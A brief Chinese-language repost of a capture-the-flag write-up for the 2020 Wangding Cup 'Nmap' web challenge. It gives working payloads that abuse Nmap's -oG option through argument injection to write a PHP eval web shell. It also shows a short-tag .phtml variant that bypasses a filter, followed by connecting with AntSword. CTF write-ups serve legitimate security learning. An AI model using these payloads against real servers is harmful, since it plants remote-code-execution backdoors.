[网鼎杯 2020 朱雀组]Nmap

本文转载自查看原文 2020-09-04 16:15 541 CTF_刷题

Nmap -oG 可以写入文件因此我们可以写入一句话木马

payload如下

' <?php @eval($_POST["hack"]);?> -oG hack.php '

结果回显hacker php被过滤因此考虑用短标签绕过

' <?= @eval($_POST["pd"]);?> -oG pd.phtml '

用蚁剑连接即可

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 [网鼎杯 2020 朱雀组]Nmap [网鼎杯 2020 朱雀组]Nmap 1 [网鼎杯 2020 朱雀组]Nmap [网鼎杯 2020 朱雀组]phpweb [网鼎杯 2020 朱雀组]phpweb 2020网鼎杯朱雀组 phpweb 网鼎2020朱雀组 PHP_web+NMAP [网鼎杯 2020 朱雀组]Think Java 【网鼎杯2020朱雀组】Web WriteUp [网鼎杯2020朱雀组]Web部分wp